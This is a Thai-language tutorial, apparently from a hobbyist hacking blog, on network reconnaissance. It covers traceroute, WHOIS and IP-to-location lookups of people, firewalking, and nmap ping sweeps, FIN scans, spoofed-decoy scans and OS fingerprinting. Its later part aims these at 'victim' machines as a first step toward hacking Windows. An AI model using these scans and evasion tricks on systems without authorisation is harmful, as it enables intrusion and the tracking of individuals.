เมื่อ ไฟร์วอลล์ถูกติดตั้งให้ไม่ตอบสนองต่อ traceroute และ ping จากโลกภายนอก เพื่อป้องกันไม่ให้ผู้บุกรุกเก็บข้อมูลของเครือข่ายภายในได้ ตัวอย่างด้านล่างนี้แสดงถึงผลลัพธ์ที่ได้จาก tracert.exe เมื่อถูกป้องกัน traffic ของ ping โดยไฟร์วอลล์หรือ router
C:\WINDOWS>tracert vanguard.com
Tracing route to vanguard.com [192.175.182.6]
over a maximum of 30 hops:
1 103 ms 98 ms 97 ms tnt3.culpeper.va.da.uu.net [206.115.221.174]
2 105 ms 104 ms 104 ms 206.115.233.205
3 103 ms 97 ms 104 ms Fddi0-0.HR1.DCA1.ALTER.NET [137.39.33.130]
4 101 ms 736 ms 103 ms 102.ATM2-0.XR2.DCA1.ALTER.NET [146.188.160.250]
5 105 ms 105 ms 103 ms 294.at-7-2-0.XR2.DCA8.ALTER.NET [146.188.163.30]
6 100 ms 104 ms 118 ms POS7-0.BR2.DCA8.ALTER.NET [152.63.35.193]
7 107 ms 105 ms 106 ms uu-gw.wswdc.ip.att.net [192.205.32.133]
8 103 ms 104 ms 103 ms gbr4-p50.wswdc.ip.att.net [12.123.9.54]
9 100 ms 102 ms 98 ms gbr1-p60.wswdc.ip.att.net [12.122.1.221]
10 101 ms 117 ms 126 ms ar1-a3120s4.wswdc.ip.att.net [12.123.8.45]
11 118 ms 103 ms 104 ms 12.127.47.50
12 * * * Request timed out.
13 * * * Request timed out.

จาก ตัวอย่างแสดงให้เห็นว่า ไม่สามารถ trace ได้อย่างสมบูรณ์ และจะได้รับ timeout message เมื่อคำสั่ง ping ถูก drop โดยปลายทาง และให้คุณสังเกตุแต่ละ hop (จากตัวอย่างได้ 11 hob) ถ้าคุณใช้คำสั่ง nslookup และตามด้วย IP ของแต่ละ hob คุณก็จะทราบว่า ก่อนที่เครื่องของคุณจะไปถึงเว็บ vanguard.com นั้นต้องผ่านที่ไหน ประเทศไหนบ้าง เราพิมพ์ไอพีแอดเดรสลงไป ในที่นี้เราพิมพ์ 203.94.12.01 (ซึ่งเป็นไอพีที่ผมต้องการหา)

$>nslookup 203.94.12.01

คุณ จะเห็นผลลัพธ์ออกมาเป็น: mail2.nol.net.in ในตอนนี้ถ้าคุณดูที่ชื่อ hostname ที่เปลี่ยนมาจากไอพีแอดเดรสอย่างตั้งใจ จะเห็นได้ว่าส่วนหลังสุดจะบอกถึง ประเทศที่ระบบนั้นตั้งอยู่ จากตัวอย่างคุณเห็น '.in' ซึ่งบอกว่าระบบนี้อยู่ในประเทศอินเดีย ทุกประเทศมีรหัสประเทศของตัวเองซึ่งจะเห็นได้บ่อยมากกว่าชื่อท้ายสุดที่ไม่ ใช่รหัสประเทศ วิธีนี้สามารถใช้เพื่อค้นหาว่าคน ๆ นั้น อยู่ในประเทศใหนถ้าคุณรู้อีเมลของเขา เช่น ถ้าคนนั้นมีที่อยู่อีเมลลงท้ายด้วย .ph แสดงว่าเขาอาจจะอาศัยอยู่ใน ประเทศฟิลิปปินส์ ประเทศอื่น ๆ ก็ทำนองเดียวกันนี้ รหัสประเทศ โดยทั่ว ๆ ไปเช่น:

ประเทศ รหัสประเทศ

ฟิลิปปินส์ .ph

ออสเตรเลีย .au

อินโดนีเซีย .id

อินเดีย .in

ญี่ปุ่น .jp

อิสราเอล .il

สหราชอาณาจักร .uk

รายการรหัสประเทศที่ครบสมบูรณ์ดูได้ที่: http://www.alldomains.com และ http://www.iana.org/domain-names.html

รายการรหัสรัฐต่าง ๆ ของสหรัฐ ฯ ดูที่: http://www.usps.gov/ncsc/lookups/abbr_state.txt

ผู้ที่ใช้วินโดวส์สามารถแปลงไอพีให้เป็น hostname ได้โดยการดาวน์โหลดยูทิลิตี้ที่ชื่อ Samspade จาก http://www.samspade.com/

อีก วิธีการหนึ่งที่ใช้หาที่อยู่ทางภูมิศาสตร์ของระบบคอมพิวเตอร์ที่ตรง จุดจริง ๆ คือการใช้ ฐานข้อมูล WHOIS เป็นฐานข้อมูลหลักที่ประกอบด้วยข้อมูลหลากหลายเช่นข้อมูลสำหรับการติดต่อ ชื่อ ผู้ที่เป็นเจ้าของโดเมนนั้น หาข้อมูลโดยการใส่ hostname ลงไป แล้วบริการนี้จะบอกข้อมูลที่อยู่ในฐานข้อมูลออกมา

วิธีนี้ สามารถใช้เพื่อหาข้อมูลที่ถูกต้องเกี่ยวกับไอพี หรือ hostname ที่ต้องการ อย่างไรก็ตามมันอาจจะไม่มี ประโยชน์ถ้าคุณพยายามหาสถานที่ตั้งที่แท้จริงของผู้ใช้ไอพีแบบ dynamic IP แต่อย่างน้อยวิธีนี้สามารถใช้ เพื่อหาเมืองที่ไอเอสพีนั้นอยู่ได้

คุณ สามารถใช้บริการ WHOIS ที่ http://www.alldomains.com/ นอกจากนี้คุณสามารถป้อนชื่อ hostname เข้าไปในบราวเซอร์ของคุณเพื่อใช้บริการ WHOIS โดยใช้ URL นี้: http://205.177.25.9/cgi-bin/whois?abc.com โดยเปลี่ยนชื่อ abc.com เป็นชื่อโดเมนที่คุณต้องการถามข้อมูลโดยใช้ WHOIS

วิธีนี้ ไม่สามารถใช้เพื่อหาที่อยู่ที่สามารถติดต่อได้ ของบุคคลที่ต้องการค้นหา ถ้าไอพีที่คุณใช้เพื่อหาเขาเป็นของไอเอสพีของเขา ดังนั้นคุณจำเป็นต้องรู้ชื่อโดเมน (ซึ่งลงทะเบียนโดยใช้ชื่อของเขา) หรือไม่ก็รู้ได้เพียงแต่เมือง (และไอเอสพี) ที่ใช้โดยบุคคลนั้น

ถ้า บุคคลนั้นลงทะเบียนชื่อโดเมน และคุณต้องการใช้มันเพื่อค้นหาว่าเขาอยู่ในเมืองไหน สิ่งที่ควรสังเกตในกรณีนี้ คือถ้าบุคคลนั้นลงทะเบียนชื่อโดเมนที่ใช้บริการฟรี เช่น Namezero.com ดังนั้นชื่อโดเมนอาจจะลงทะเบียน โดยใช้ชื่อของบริษัทนั้นและไม่ใช่ชื่อของบุคคลที่เราต้องการค้นหา ฉะนั้นการใช้บริการ WHOIS จะให้ข้อมูล เกี่ยวกับไอเอสพีไม่ใช่บุคคลที่เราต้องการค้นหา

ข้อ สังเกต: บริการ WHOIS โดยค่าเริ่มต้นจะรันอยู่ที่พอร์ต 43 ของระบบนั้น ลองใช้บริการโดยการ telnet ไปที่พอร์ต 43 และลองพิมพ์ค้นหา ผมไม่เคยลอง แต่มันต้องสนุกแน่ ๆ

Firewalking
ไฟร์วอลล์จะเป็น ตัวหยุดยั้ง traceroute packet และจะไม่ยินยอมให้ traceroute packet ผ่านไปยังเครื่องเป้าหมาย วิธีการทำงานของ firewalking นั้น ใช้พื้นฐานที่ว่า ถ้าไฟร์วอลล์อนุญาตให้ traffic ชนิดใดผ่านไปได้ firewalking ก็จะส่ง packet ชนิดนั้นๆ ผ่านเข้าไป เช่น ถ้าไฟร์วอลล์อนุญาตให้ UDP port 53 (DNS queries) ผ่านเข้าไปยัง DNS server ที่ตั้งอยู่ภายในเครือข่ายนั้นๆ ผู้บุกรุกก็สามารถส่ง UDP port 53 พร้อมกับค่า TTL ของ hop ถัดไป เพื่อให้ผ่านไฟร์วอลล์เข้าไปได้ และได้ข้อมูลกลับออกมา และเนื่องจาก traceoute ถูกออกแบบให้ใช้งานฟิลด์ TTL ซึ่งทำงานบน IP protocol (network layer) ดังนั้นมันจึงสามารถใช้งานได้กับ upper layer protocol อื่นๆ ได้ เช่น UDP, TCP, ICMP ดังนั้นจึงทำให้สามารถตรวจสอบ service ที่เปิดให้บริการหลังไฟร์วอลล์ได้

สรุป
เรา สามารถหยุดการใช้งาน Firewalking ได้โดยการบล็อค TTL Exceeded in Transit packet ขาออกที่ไฟร์วอลล์ หรือใช้ NAT (Network Address Translation) เพื่อซ่อน IP address ของโฮสต์ภายในเครือข่าย

สิ่งที่บท ความนี้ต้องการจะเน้นย้ำก็คือ การใช้ระบบป้องกันเพียง layer เดียวนั้นไม่เพียงพอแล้วในปัจจุบัน และเราก็ไม่สามารถที่จะไว้วางใจไฟร์วอลล์ได้ว่าจะสามารถปกป้องเครือข่ายจาก การหาข้อมูลของบรรดาผู้บุกรุกได้ ดูเหมือน host based detection จะเป็นตัวช่วยที่ดีอีกทางหนึ่งได้เช่นกัน นอกจากนี้ network intrusion detection system (NIDS) ก็ยังสามารถเป็นหูเป็นตาให้ผู้ดูแลระบบได้ด้วย

ดัง นั้นการใช้ multiple layers สำหรับการทำ overlapping security นั้นเป็นสิ่งที่จำเป็นอย่างยิ่ง ผู้ที่มีหน้าที่เกี่ยวกับเรื่องนี้ในแต่ละองค์กรควรตระหนัก และหาทางนำเทคโนโลยีที่มีอยู่ในปัจจุบันไปประยุกต์ใช้เพื่อให้เกิดประโยชน์ สูงสุด

แบบโปรแกรมที่แสดงผลเป็น Graphic

ให้ คุณหาโปรแกรมกันเอาเองนะครับ โปรแกรม VisualRoute ซึ่งจะแสดงผลเป็นรูปภาพ ง่ายต่อการที่จะเข้าใจ แถมมีรูปแผนที่ให้คุณได้ดููอีกด้วยครับ

จาก ภาพตัวอย่างคุณสามารถเห็นเส้นทางการเดินทางของ packet ในแต่ละ hop ได้โดยง่าย คืออย่าคุณจะเข้าไปดูที่เว็บไหนสักแห่งหนึ่งนั้น เครื่องคุณต้องไปผ่านประเทศไหนบ้าง เมืองอะไร คือคุณไม่ต้องอาศัยเทคนิคหรือความเข้าใจในคำสั่ง tracert ,whois , nslookup มากเท่าไหร่ คุณก็ได้ข้อมูลที่สมบูรณ์มาแล้วด้วยโปรแกรมนี้ แจ่มฮะ

การสแกน(Scaning)

Port Scanning เป็นหนึ่งในเทคนิคที่โด่งดังที่สุดที่ผู้โจมตีใช้ในการค้นหาบริการ Service ที่พวกเขาจะสามารถเจาะผ่านเข้าไปยังระบบๆได้ โดยปกติแล้วทุก ๆ ระบบที่ต่อเข้าสู่ระบบ LAN หรือระบบอินเทอร์เน็ตจะเปิด service อยู่บน port ที่เปิดเป็นตัวเลขต่างๆสำหรับการทำ Port Scanning นั้น ผู้โจมตีจะสามารถค้นหาข้อมูลได้มากมายจากระบบของเป้าหมาย ได้แก่ บริการอะไรบ้างที่กำลังรันอยู่ ผู้ใช้คนไหนเป็นเจ้าของบริการเหล่านั้น สนับสนุนการล็อกอินด้วย anonymous (แบบไม่ประสงค์ออกนาม)หรือไม่ และบริการด้านเครือข่ายมีการทำ authentication หรือไม่ การทำ Port Scanning ทำได้โดยการส่งข้อความหนึ่งไปยังแต่ละพอร์ต ณ เวลาหนึ่ง ๆ ผลลัพธ์ที่ตอบสนองออกมาจะแสดงให้เห็นว่าพอร์ตนั้น ๆ ถูกใช้อยู่หรือไม่และสามารถทดสอบดูเพื่อหาจุดอ่อนต่อไปได้หรือไม่ Port Scanners มีความสำคัญต่อผู้ชำนาญด้านความปลอดภัยของเครือข่ายมากเพราะว่ามันสามารถ เปิดเผยจุดอ่อนด้านความปลอดภัยที่มีความเป็นไปได้ของระบบเป้าหมาย

ถึง แม้ว่า Port Scans สามารถเกิดขึ้นกับระบบของคุณ แต่ก็สามารถตรวจจับได้และก็สามารถใช้เครื่องมือที่เหมาะสมมาจำกัดจำนวนของ ข้อมูลเกี่ยวกับบริการที่เปิดได้ ทุกๆระบบที่เปิด สู่สาธารณะจะมีพอร์ตหลายพอร์ตที่เปิดและพร้อมให้ใช้งานได้ (ต้องรู้ว่าแต่ละ port ที่เิปิดนั้นคือบริการอะไร) ซึ่งตรงนี้คุณต้องทำการกำหนดสิทธิ์ต่างในแต่ละ port และจำกัดจำนวนพอร์ตที่จะเปิดให้แก่ผู้ใช้ที่ได้รับอนุญาตและปฏิเสธการเข้า ถึงมายังพอร์ตที่ปิด

เทคนิคต่าง ๆ ของ Port Scan
ก่อน ที่คุณจะป้องกัน Port Scans คุณก็จะต้องเข้าใจเสียก่อนว่า Port Scans ทำงานอย่างไร เนื่องจากมีเทคนิคของ Port Scanning อยู่มากมายหลายรูปแบบ ซึ่งมีเครื่องมือ Port Scanning ที่ทำงานโดยอัตโนมัติ เช่น Nmap และ Nessus ที่ผมแนะนำโปรแกรม 2 ตัวนี้ก็เราะว่าโปรแกรม 2 ตัวนี้มีความยืดหยุ่นในการแสกนสูง สามารถกำหนดรูปแบบการแสกนได้อย่างอิสระ ไม่เหมือนกับโปรแกรมทั่วๆไปที่แสกนได้ไม่กี่อย่างๆ

การ scan ต่อไปนี้เป็นรูปแบบมาตรฐานสำหรับ Nmap และ Nessus

1. Address Resolution Protocol (ARP) scans จะตรวจหาอุปกรณ์ที่ทำงานในเครือข่ายโดยการส่งชุดของ ARP broadcasts และเพิ่มค่าของฟิลด์ที่บรรจุ IP address ของเป้าหมายในแต่ละ broadcast packet การ scan ชนิดนี้จะได้รับผลตอบสนองจากอุปกรณ์ที่มี IP บนเครือข่ายออกมาในรูปแบบของ IP address ของแต่ละอุปกรณ์ การ scan แบบนี้จึงทำการ map out ได้ทั้งเครือข่ายอย่างมีประสิทธิภาพ

2.The Vanilla TCP connect scan เป็นเทคนิคการ scan แบบพื้นฐานและง่ายที่สุด คือจะใช้ connect system call ของระบบปฏิบัติการไปบนระบบเป้าหมายเพื่อเปิดการเชื่อมต่อไปยังทุก ๆ พอร์ตที่เปิดอยู่ การ scan ชนิดนี้สามารถจับได้ง่ายมาก โดยล็อก (log) ต่าง ๆ ของระบบที่เป็นเป้าหมายจะแสดงการร้องขอการเชื่อมต่อ (connection requests ) และข้อความแสดงข้อผิดพลาด (error messages) สำหรับบริการที่ตอบรับการเชื่อมต่อนั้น

3.The TCP SYN (Half Open) scans เทคนิคนี้บางครั้งถูกเรียกว่า half open เพราะว่าระบบที่ทำการโจมตีไม่ได้ปิดการเชื่อมต่อที่ได้เปิดไว้ scanner จะส่ง SYN packet ไปยังเป้าหมายและรอการตอบสนอง ถ้าพอร์ตถูกเปิดไว้เป้าหมายก็จะส่ง SYN/ACK กลับมา แต่ถ้าพอร์ตถูกปิดอยู่ เป้าหมายก็จะส่ง RST กลับมา วิธีการ scan รูปแบบนี้ยากต่อการตรวจจับ ปกติเครื่องที่เป็นเป้าหมายจะทำหน้าที่ปิดการเชื่อมต่อที่เปิดไว้ และส่วนใหญ่จะไม่มีระบบการล็อกที่เหมาะสมในการตรวจจับการ scan ชนิดนี้

4.The TCP FIN scan เทคนิคนี้สามารถที่จะทะลุผ่านไฟล์วอลล์ ส่วนใหญ่, packet filters , cละโปรแกรมตรวจจับการ scan ไปได้โดยไม่ถูกตรวจพบ เพราะระบบที่ทำการโจมตีจะส่ง FIN packets ไปยังระบบของเป้าหมาย สำหรับพอร์ตต่าง ๆ ที่ปิดอยู่จะตอบสนองกลับไปด้วย RST ส่วนพอร์ตที่เปิดจะไม่สนใจ packets เหล่านั้นเลย ดังนั้นเครื่องที่ทำการโจมตีก็จะได้ข้อมูลว่ามันได้รับ RST จากพอร์ตไหนบ้างและไม่ได้ RST จากพอร์ตไหนบ้าง

5.The TCP Reverse Ident scan เป็นเทคนิคที่สามารถตรวจหาชื่อของเจ้าของแต่ละโพรเซสที่เป็นการเชื่อมต่อ ด้วย TCP บนเครื่องเป้าหมาย การ scan ชนิดนี้จะทำให้ระบบที่ทำการโจมตีสามารถเชื่อมต่อเข้าไปยังพอร์ตที่เปิดอยู่ และใช้ ident protocol ในการค้นหาว่าใครเป็นเจ้าของโพรเซสบนเครื่องเป้าหมายได้

6.The TCP XMAS ถูกใช้เพื่อหาพอร์ตบนเครื่องเป้าหมายที่อยู่ในสถานะ listening โดยจะส่ง TCP packet ที่มี flag เป็น URG, PSH และ FIN ใน TCP header ไปยังพอร์ตของเครื่องเป้าหมาย ถ้าพอร์ต TCP ของเครื่องเป้าหมายปิดอยู่ พอร์ตนั้นก็จะส่ง RST กลับมา แต่ถ้าพอร์ตเปิดอยู่ก็จะไม่สนใจ packet นั้นเลย

7.The TCP NULL scan เทคนิคนี้จะส่ง TCP packet ที่มี sequence number แต่ไม่มี flag ออกไปยังเครื่องเป้าหมาย ถ้าพอร์ตปิดอยู่จะส่ง กลับมา RST packet กลับมา แต่ถ้าพอร์ตเปิดอยู่ ก็จะไม่สนใจ packet นั้นเลย

8.The TCP ACK scan เป็นเทคนิคที่ใช้ค้นหาเว็บไซต์ที่เปิดบริการอยู่ แต่ปฏิเสธการตอบสนองต่อ ICMP ping หรือค้นหากฎ (rule) หรือนโยบาย ( policy) ต่าง ๆ ที่ตั้งไว้ที่ไฟล์วอลล์เพื่อตรวจสอบดูว่าไฟล์วอลล์สามารถกรอง packet อย่างง่าย ๆ หรือเทคนิคชั้นสูง โดยการ scan แบบนี้จะใช้ TCP packet ที่มี flag เป็น ACK ส่งไปยังพอร์ตเครื่องปลายทาง ถ้าพอร์ตเปิดอยู่ เครื่องเป้าหมายจะส่ง RST กลับมา แต่ถ้าปิดอยู่ก็จะไม่สนใจ packet นั้น

9.The FTP Bounce Attack ใช้โพรโตคอล ftp สำหรับสร้างการเชื่อมต่อบริการ ftp ของ proxy วิธีการ scan แบบนี้ ผู้โจมตีจะสามารถซ่อนตัวอยู่หลัง ftp server และ scan เป้าหมายอื่น ๆ ได้โดยไม่ถูกตรวจจับ ดังนั้น ftp servers ส่วนใหญ่จะมีการ disable บริการของ ftp เพื่อความปลอดภัยของระบบ

10.The UDP ICMP port scan ใช้โพรโตคอล UDP ในการ scan หาพอร์ตหมายเลขสูง ๆ โดยเฉพาะในระบบ Solaris แต่จะช้าและไม่น่าเชื่อถือ

11.The ICMP ping-sweeping scan จะใช้คำสั่ง ping เพื่อกวาดดูว่ามีระบบไหนที่เปิดใช้งานอยู่ เครือข่ายส่วนใหญ่จึงมีการกรองหรือ disabled
โพรโตคอล ICMP เพื่อความปลอดภัยของระบบ

สำหรับ ผู้ที่ใช้โปรแกรม nmap ไม่ได้ ให้ติดตั้งโปรแกรม WinPcap 3.1BETA4 ก่อนนะครับ คลิกที่ชื่อโปรแกรม แล้วลองใช้โปรแกรม nmap ต่ออีกทีครับ รับรองใช้ได้แน่ๆ

เทคนิคการ Ping Sweep

ใน บทความต่อไปนี้ ผมจะมุ่งประเด็นเกี่ยวกับเรื่องการแสกนว่ามีเรื่องไหนยัง login อยู่หรือกำลังใ้ช้งาน และ port ต่างที่เครื่องเหยื่อไ้ด้เิปิดเอาไว้ จากบทความของผม เวลาุคุณจะต้องสนใจเครื่องของเหยื่อที่ port 139 กับ 445 เท่านั้น เพราะเ็ป็นส่วนจำเป็นในการ Hack Window

คือการ ping ไปยังเครื่องเป้าหมายที่จำนวนมากๆ ในวง Network ที่คุณใช้อยู่ หรือวง lan นั่นเอง (ใน Internet ก็ใช้ได้) โดยแสกนพร้อมๆกัน คล้ายกับการกราดยิง เพื่อตรวจสอบว่าเครื่องปลายทางได้เปิดอยู่หรือไม่ก็ตาม เช่นคุณมี IP x.y.z.6 ตรง x.y.z อาจเป็นตัวเลขใดๆก็ได้ แต่เลข 6 คือเลขชุดหลังของ ip คุณ เวลาคุณแสกนหาให้เขียนลงไปดังนี้ x.y.z.0/24 จากตรงเลข 6 เปลี่ยนเป็น 0/24 หมายความว่าเป็นการแสกน IP ตั้งแต่ x.y.z.1- x.y.z.255

ยกตัวอย่าง

สมมติ คุณกำลังต่อเน็ต หรือกำลังใช้คอมอยู่ในวงแลน ให้คุณเิดหน้าต่างดอสขนึ้มา (หรือ Start > Run พิมพ์ cmd.exe) พอหน้าต่างดอสขนึ้มาให้คุณพิมพ์ ipconfig แล้วกด Enter

C:\>ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Media State . . . . . . . . . . . : Cable Disconnected

PPP adapter TOT:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 172.16.66.216
Subnet Mask . . . . . . . . . . . : 255.255.255.255
Default Gateway . . . . . . . . . : 172.16.66.216

ให้ คุณดูที่ตัวหนังสือสีแดงครับ คือ IP ของคุณเอง จากนั้น IP เครื่องต่างๆที่อยู่ในวงแลนเน็ตของคุณ หรือวงแลนสำนักงานคุณ ก็จะมี IP ประมาณว่า

172.16.66.1 ถึง 172.16.66.225 ครับผม แต่เวลาแสกนถ้าคุณมากำหนดเป็นตัวเลขอาจต้องพิมพ์แบ่งช่วงเอาเอง แต่ถ้าคุณจะแสกน port ทั้งวงแลน คือ แสกนมันทุกเครื่องในวงแลนเลย เวลาคุณกำหนด IP ก็ต้องใ้คำสั่งกำหนด เป็น 172.16.66.0/24

โดย ปรกติ ถ้าคุณใช้คำสั่ง ping ธรรมดา จะมีการส่ง ICMP ECHO (Type 8) ออกไปยังเครื่องปลายทางและรอคอย ICMP ECHO_REPLY (Type 0) ส่งกลับมา ถึงแม้ ping จะมีประโยชน์ในการทดสอบว่าเครื่องปลายทางนั้นเปิดอยู่หรือไม่ก็ตาม แต่มันจะเหมาะกับ Network ขนาดเล็กและขนาดกลางเท่านั้น ซึ่งถ้ามาใช้ในใน Network ขนาดใหญ่อย่าง Internet มักจะใช้ได้ไม่มีประสิทธิภาพ โดยใช้ –sP เป็นการ ping scan (กรณีนี้ผมไ้ด้ เอาโปรแกรม nmap มาแตกใส่ไว้ที่ไดร์ฟ C:)

C:>nmap –sP 172.16.66.0/24

คำ สั่งนี้จะใช้ได้เมื่อคุณได้อยู่ในวง Network เดียวกับคุณ หรือ วงอื่น ซึ่ง จะแสกนวงเดียวกับคุณ IP 172.16.66.0 – 172.16.66.255 หมายถึง คุณต้องมี IP ที่อยู่ระหว่าง 172.16.66.0 – 172.16.66.255 ถึงจะใช้คำสั่งนี้ได้ เช่นคุณมี IP = 172.16.66.216 สังเกตเลขชุดสุดท้ายที่อยู่หลังจุดให้ดีๆ อาจเป็นเลขอะไรก็ได้ จาก 1-255 ถึงจะใช้ 0/24 แทน หรือ

C:>nmap –sP 172.16.66.11-172.16.66.20

คำสั่งนี้จะแสกนเครื่องที่อยู่ในวง Network ที่มี IP ระหว่าง 172.16.66.11 - 172.16.66.20

C:>nmap –sP 172.16.66.* หรือ C:>nmap –sP 172.16.66.0/24

คำสั่งนี้จะแสกนเครื่องที่อยู่ในวง Network ที่มี IP 172.16.66.1 ถึง 172.16.66.255

โดย ปรกติ ถ้าคุณใช้คำสั่ง ping ธรรมดา จะมีการส่ง ICMP ECHO (Type 8) ออกไปยังเครื่องปลายทางและรอคอย ICMP ECHO_REPLY (Type 0) ส่งกลับมา ถึงแม้ ping จะมีประโยชน์ในการทดสอบว่าเครื่องปลายทางนั้นเปิดอยู่หรือไม่ก็ตาม แต่มันจะเหมาะกับ Network ขนาดเล็กและขนาดกลางเท่านั้น ซึ่งถ้ามาใช้ในใน Network ขนาดใหญ่อย่าง Internet มักจะใช้ได้ไม่มีประสิทธิภาพ โดยใช้ –sP เป็นการ ping scan เพื่อเป็นการตรวจสอบว่ามีเครื่องใดกำลัง logon อยู่

nmap –sP 203.118.98.0/24

คำ สั่งนี้จะใช้ได้เมื่อคุณได้อยู่ในวง Network เดียวกับคุณ หรือ วงอื่น ซึ่ง จะแสกนวงเดียวกับคุณ IP 203.118.98.0 – 203.118.98.255 หมายถึง คุณต้องมี IP ที่อยู่ระหว่าง 203.118.98.0 – 203.118.98.255 ถึงจะใช้คำสั่งนี้ได้ เช่นคุณมี IP = 203.118.98. 10 สังเกตเลขชุดสุดท้ายที่อยู่หลังจุดให้ดีๆ อาจเป็นเลขอะไรก็ได้ จาก 1-255 หรือจะใช้ 0/24 แทน หรือ

nmap –sP 203.118.98.11-203.118.98.20

คำสั่งนี้จะแสกนเครื่องที่อยู่ในวง Network ที่มี IP ระหว่าง 203.118.98.11 - 203.118.98.20

nmap –sP 203.118.98.* หรือ C:>nmap –sP 203.118.98.0/24

คำสั่งนี้จะแสกนเครื่องที่อยู่ในวง Network ที่มี IP 203.118.98.1 ถึง 203.118.98.255

(เครื่องมือ nmap นี้ จะเป็นการหาแบบละเอียด เมื่อเทียบกับโปรแกรมอื่น แต่อาจใช้เวลานานกว่า)

เทคนิคการแสกนหลบ เมื่อเครื่องปลายทาง block ICMP

จะ เป็นการ Ping Sweep ขั้นสูงที่เรียกว่า TCP Ping scan โดยการใช้พารามิเตอร์ –PT พร้อมกับระบุหมายเลข port ต่างๆเข้าไป ซึ่งการระบุเลข port นั้นจะต้องทราบว่าเครื่องส่วนใหญ่นั้นจะต้องเปิดเอาไว้เพื่อติดต่อสื่อสาร กับเครื่องอื่นๆ เช่น http 80 , SMTP 25 , POP 110 , IMAP 143 และอื่นอีกมาก ซึ่งปรกติจะต้องเปิดไว้คือ http 80 ซึ่งอาจทะลุผ่าน firewall ได้ถ้ามีการกำหนด firewall ได้ไม่ดี

nmap –sP –PT 80 203.118.98.0/24

ตรง เลข 80 ที่ผมได้ทำสีไว้เป็นการแสกนผ่านทาง http 80 ซึ่งอาจเปลี่ยนเป็นเลข port อื่นๆได้ตามที่ได้กล่าวมาด้านบนซึ่ง port ต่างๆที่ได้ใส่ไปก็คือการหา service นั่นเอง SMTP 25 , POP 110 , IMAP 143

nmap –sP –PT 25 203.118.98.0/24 เป็นการหาว่าเครื่องในวงแลนคุณเครื่องไหนเปิด SMTP 25

nmap –sP –PT 110 203.118.98.0/24 เป็นการหาว่าเครื่องในวงแลนคุณเครื่องไหนเปิด POP 110

nmap –sP –PT 143 203.118.98.0/24 เป็นการหาว่าเครื่องในวงแลนคุณเครื่องไหนเปิด IMAP 143

เทคนิคการแสกนแบบ TCP FIN scan

เทคนิคนี้สามารถที่จะทะลุผ่านไฟล์วอลล์ ส่วนใหญ่ และมีการเก็บผลลัพธ์ไว้ในไฟล์ text

nmap –sF 203.118.98.0/24 –oN output.txt

จาก บรรทัดบน –sF เป็นการแสกนแบบ Stealth FIN รายละเอียดให้ดูรูปประเภทการแสกนที่อยู่ช่วงแรกๆ และพารามิเตอร์ –o เป็นการบันทึกผลลงเป็นไฟล์ ส่วน N หลัง –o ตรง (-oN) หมายถึงให้บันทึกในรูปแบบที่อ่านเข้าใจได้โดยโปรแกรมจะสร้างไฟล์ output.txt หรือถ้าคุณต้องการบันทึกเพื่อจะนำไปใช้กับโปรแกรมอื่นๆ ให้ระบุเป็น พารามิเตอร์ –oM แทน

ผมเหนื่อยแระ ขี้เกียจทำเป็็นหัวข้อ

คุณ อาจใช้ Option + Parameter อื่นๆ ผสมผสานกันได้ โดยประยุกต์จากตัวอย่างต่างๆที่ผมได้ทำเป็นตัวอย่างดังที่เห็นอยู่ ซึ่งจะทำให้การใช้งานเครื่องมือนี้ มีประสิทธิภาพมากขึ้น ในการแสกนหาเครื่องเหยื่อ ในโปรแกรม Nmap ได้อย่างลงตัวกับสถานะการณ์ (แต่ต้องหัดเอาเองบ้างนะ) ซึ่งผลจากการแสกนต่างๆนั้นรับรองได้้เลยว่าโปรแกรมอื่นคงทำไม่ได้อย่าง โปรแกรมนี้ แต่มันก็ยากในการใช้งาน เพราะ Option ในตัวโปรแกรมช่างเยอะเหลือเกิน จะถอดใจตอนนี้ก็ยังไม่สายนะ ดูชื่อเว็บที่ผมตั้งสิ กรรมกรไซเบอร์ มันก็ต้องออกแรงกันหน่อย และสำหรับคนที่ยังไม่ถอดใจ ผมก็จะมีตัวอย่าง และ Tip เด็ดๆให้อีกเล็กๆน้อยๆ

Nmap มีความสามารถในการหลอก firewall เครื่องปลายทาง โดยการส่งแพ็คเก็ตปลอมจำนวนมากที่ไม่เกี่ยวข้องกับการแสกนเข้าไปในระบบ ด้วยการใช้พารามิเตอร์ –D และขณะเดียวกันก็ทำการแสกนจริงๆไปด้วย และด้วยการเพิ่มความยากในการตรวจจับ สามารถปลอม IP ADDRESS ของ server อื่นที่มีอยู่จริง แต่ถ้า IP ADDRESS ที่ปลอมนั้นไม่มีอยู่จริงๆ การแสกนของคุณจะเป็นการทำ SYN Flood ซึ่งไปเข้าเงื่อนไขการโจมตีระบบด้วย Denial of Service (การทำให้ Network ล่ม คือทำให้การรับส่งข้อมูลใน Network คับคั่งหรือที่เห็นง่ายๆก็คือ เน็ตจะช้า หรือเครื่องอาจหลุดจาก Internet ได้) วิธีดูจากข้างล่างนี้

nmap –sS 203.118.98.110 –D 203.114.234.5

-sS เป็นการแสกนแบบ TCP SYN scan 192.16.81.110 เป็น IP เครื่องเป้าหมายที่คุณจะแสกน และส่วนที่ตามหลัง Option –D คือ IP 203.114.234.5 เป็น IP Server ของอะไรก็ได้เช่น yahoo , sanook ซึ่งจะหา IP นี้ได้โดยการ เปิด ดอส ขึ้นมาแล้วพิมพ์ c:\ping www.yahoo.com เท่านี้คุณก็จะได้ IP Server จริงๆ ที่จะนำมาใช้ในคำสั่งนี้ แต่ถ้าคุณเอา ไอพีมามั่วๆ จะเป็น เข้าเงื่อนไขการโจมตีระบบด้วย Denial of Service
nmap –O 203.121.148.18

คำ สั่งบนนี้ จะเป็นการหาข้อมูลจากเครื่องที่ มี IP 203.121.148.18 ว่ามีการเปิดที่ Port ไหนบ้าง และใช้ระบบปฏิบัติการอะไร แต่การแสกนอาจใช้เวลานาน ถ้าคนที่ใจร้อนอาจหันไปพึ่งโปรแกรมอื่น ผมก็ไม่ว่าอะไรครับ แต่ขอบอก โปรแกรมนี้ แสกนได้แม่นยำกว่าโปรแกรมอื่นอยู่มากทีเดียว
nmap –p80 –O 203.121.148.18

คำสั่งบนนี้ เป็นการใช้ option –p เข้ามาช่วยหา ในกรณีที่เครื่องเหยื่อได้เปิด port 80 เอาไว้

การประยุกต์ใช้งานอื่นๆ

nmap –sS –p 25,80,135-139,455 –n 203.118.98.110

จาก คำสั่งบนนี้ เป็นการแสกนไปที่เครื่อง 203.118.98.110 ไปที่ port 25 , port 80 , port 135 , 136 ,137 , 138 ,139 , port 455 ว่าเปิดอยู่หรือไม่

nmap –sS –O 203.118.98.110

